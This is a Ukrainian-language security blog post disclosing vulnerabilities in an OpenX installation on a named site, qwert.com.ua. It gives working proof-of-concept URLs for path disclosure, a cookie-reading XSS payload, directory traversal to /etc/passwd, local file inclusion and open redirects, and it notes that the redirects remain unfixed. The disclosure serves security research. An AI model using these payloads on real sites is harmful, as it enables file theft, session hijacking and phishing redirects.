Websecurity - Веб безпека

21.11.2009

У березні, 13.03.2009, я знайшов Full path disclosure, Cross-Site Scripting, Directory Traversal, Local File Inclusion та Redirector уразливості на сайті http://qwert.com.ua. Про що найближчим часом сповіщу адміністрацію сайта.

Детальна інформація про уразливості з’явиться пізніше.

24.05.2010

Full path disclosure:

http://qwert.com.ua/openx/www/delivery/fc.php?MAX_type=1

XSS:

http://qwert.com.ua/openx/www/delivery/fc.php?MAX_type=%3CBODY%20onload=alert(document.cookie)%3E

Directory Traversal:

http://qwert.com.ua/openx/www/delivery/fc.php?MAX_type=../../../../../../../etc/passwd%00

Local File Inclusion:

http://qwert.com.ua/openx/www/delivery/fc.php?MAX_type=../file.php

Redirector:

http://qwert.com.ua/openx/www/delivery/ck.php?dest=http://websecurity.com.ua
http://qwert.com.ua/openx/adclick.php?maxdest=http://websecurity.com.ua
http://qwert.com.ua/openx/adclick.php?dest=http://websecurity.com.ua

Дані уразливості вже виправлені (за рахунок оновлення движка). Окрім Redirector уразливостей, також відомих як URL Redirector Abuse (в WASC TC v2).

This entry was posted on 19:13 24.05.2010 and is filed under Уразливості. You can follow any responses to this entry through the RSS 2.0 feed.